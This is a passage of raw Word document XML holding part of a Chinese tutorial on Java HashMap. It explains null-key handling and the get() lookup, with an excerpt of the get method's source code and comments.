        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>同样当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时会进行特殊处理，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>table[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的链表上查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的过程是先计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>table.length</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>取摸计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值，然后遍历</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>table[index]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上的链表，直到找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，然后返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C20">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="9CBA39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 8" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="190500" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> V get(Object key) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (key == </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> getForNullKey();</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash = hash(key.hashCode());</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>table[index]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>遍历查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，若找到则返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，找不到返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Entry&lt;K,V&gt; e = table[indexFor(hash, table.length)];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">             e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">             e = e.next) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            Object k;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
